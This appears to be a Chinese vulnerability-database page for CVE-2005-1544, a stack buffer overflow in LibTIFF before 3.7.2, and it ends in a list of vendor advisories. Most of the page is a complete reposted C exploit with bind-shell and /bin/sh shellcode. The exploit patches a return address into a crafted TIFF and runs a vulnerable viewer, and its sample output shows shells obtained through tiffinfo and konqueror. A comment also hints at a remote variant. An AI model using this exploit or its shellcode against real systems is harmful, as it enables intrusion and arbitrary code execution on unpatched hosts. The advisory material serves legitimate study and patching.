LibTIFF TIFFOpen缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109873 漏洞类型 缓冲区溢出
发布时间 2006-03-05 更新时间 2007-03-07
CVE编号 CVE-2005-1544 CNNVD-ID CNNVD-200505-1027
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1554
https://www.securityfocus.com/bid/13585
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1027
|漏洞详情
libTIFF的3.7.2之前版本存在基于栈的缓冲区溢出,远程攻击者可以通过一个含有缺陷的BitsPerSample标签的TIFF文件来执行任意代码。
|漏洞EXP
/*
 LibTIFF exploit
 Tested on LibTIFF 3.7.1
 Coded by Agustin Gianni (agustingianni at gmail.com) and Samelat

 Blog: http://gruba.blogspot.com
  
 In other versions and/or Linux distributions you might need to
 adjust some offsets.

 gr00vy@kenny:/home/gr00vy/EXPLOIT$ make libtiff_exploit
 cc libtiff_exploit.c -o libtiff_exploit
 gr00vy@kenny:/home/gr00vy/EXPLOIT$ ./libtiff_exploit /usr/local/bin/tiffinfo evil.tiff
 Using RET: 0xbfffffb4
 TIFFReadDirectory:
 Warning, evil.tiff: unknown field with tag 260 (0x104) encountered.
 evil.tiff:
 Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); tag trimmed.
 evil.tiff:
 Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
 sh-3.00$

 gr00vy@kenny:/home/gr00vy/storage/Exploits/Libtiff-3.7.1$ ./libtiff_exploit
 /usr/kde/3.3/bin/konqueror evil.tiff
 Linux Enabled
 Using RET: 0xbfffffb1
 konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
 konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
 TIFFReadDirectory: Warning, : unknown field with tag 260 (0x104) encountered.
 : Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1);
 tag
 trimmed.
 : Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
 sh-3.00$ exit
 exit

 Heheh it also works like a remote exploit i would leave that work (easy work) for the
 "interested" people.

*/

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define OFFSET 0x3F /* return address offset */
#define SHELL_OFFSET 0x0102 /* shellcode address offset */
#define DISPLAY "DISPLAY=:0.0" /* no comments ... */
#define HOMEDIR "HOME=/tmp/"

int
main(int argc, char **argv, char **env)
{
 /* Linux shellcode that binds a shell on port 4369 */
char linux_bind[] = "\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x31"
  "\xdb\x43\x89\xe1\xcd\x80\x99\x52\x52\x52"
  "\xba\x02\x01\x11\x11\xfe\xce\x52\x89\xe2"
  "\x31\xc9\xb1\x10\x51\x52\x50\x89\xc2\x89"
  "\xe1\xb0\x66\xb3\x02\x89\xe1\xcd\x80\xb0"
  "\x66\xb3\x04\x53\x52\x89\xe1\xcd\x80\x31"
  "\xc0\x50\x50\x52\x89\xe1\xb0\x66\xb3\x05"
  "\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f"
  "\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f"
  "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"
  "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

 /* (?) lies lies lies lies!*/
 #ifdef FREEBSD
 printf("FreeBSD Enabled\n");
 char shellcode[]=
  "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd"
  "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";
 
 #else
 printf("Linux Enabled\n");
 char shellcode[] =
  "\xeb\x20\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c"
  "\x88\x46\x07\x8d\x56\x0c\x8d\x4e\x08\x89\xf3"
  "\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\xb0\x01\xcd"
  "\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f"
  "\x73\x68\x23";
 
 #endif

 if(argc < 3)
 {
  fprintf(stderr, "Error, arguments are like these\n"
    "%s <path_to_vuln> <eviltiff.tiff>\n", argv[0]);
  return -1;
 }
 
 char *envp[] = {HOMEDIR, DISPLAY, shellcode, NULL};
 
 /* argv[1] -> executable file that is linked with vuln tiff library */
 long ret = 0xc0000000 - sizeof(void *) - strlen(argv[1]) - strlen(shellcode) - 0x02;
 
 int fd = open(argv[2], O_RDWR);
 if(fd == -1)
 {
  perror("open()");
  return -1;
 }
 
 if(lseek(fd, OFFSET, SEEK_SET) == -1)
 {
  perror("lseek()");
  close(fd);
  return -1;
 }
 
 if(write(fd, (void *) &ret, sizeof(long)) < sizeof(long))
 {
  perror("write()");
  close(fd);
  return -1;
 }
 
 close(fd);
 
 fprintf(stdout, "Using RET: 0x%.8x\n", (unsigned int) ret);
 
 if(execle(argv[1], "tiff", argv[2], NULL, envp) == -1)
 {
  perror("execve()");
  return -1;
 }
 
 return 0;
}

// milw0rm.com [2006-03-05]
|受影响的产品
Turbolinux Turbolinux Workstation 8.0 Turbolinux Turbolinux Workstation 7.0 Turbolinux Turbolinux Server 10.0 Turbolinux Turbolinux Server 8.0 Turbolinux Turbolinux Server 7.0
|参考资料

来源:XF
名称:libtiff-bitspersample-bo(20533)
链接:http://xforce.iss.net/xforce/xfdb/20533
来源:MISC
链接:http://bugs.gentoo.org/show_bug.cgi?id=91584
来源:GENTOO
名称:GLSA-200505-07
链接:http://www.gentoo.org/security/en/glsa/glsa-200505-07.xml
来源:SECUNIA
名称:15320
链接:http://secunia.com/advisories/15320
来源:MISC
链接:http://bugzilla.remotesensing.org/show_bug.cgi?id=843
来源:UBUNTU
名称:USN-130-1
链接:http://www.ubuntu.com/usn/usn-130-1
来源:BID
名称:13585
链接:http://www.securityfocus.com/bid/13585
来源:OSVDB
名称:16350
链接:http://www.osvdb.org/16350
来源:MANDRIVA
名称:MDKSA-2006:042
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2006:042
来源:DEBIAN
名称:DSA-755
链接:http://www.debian.org/security/2005/dsa-755
来源:SECTRACK
名称:1013944
链接:http://securitytracker.com/id?1013944
来源:SECUNIA
名称:18943
链接:http://secunia.com/advisories/18943
来源:SECUNIA
名称:18289
链接:http://secunia.com/advisories/18289
来源:SECUNIA
名称:16872
链接:http://secunia.com/advisories/16872
来源:MANDRIVA
名称:MDKSA-2006:042
链接:http://frontal2.mandriva.com/security/a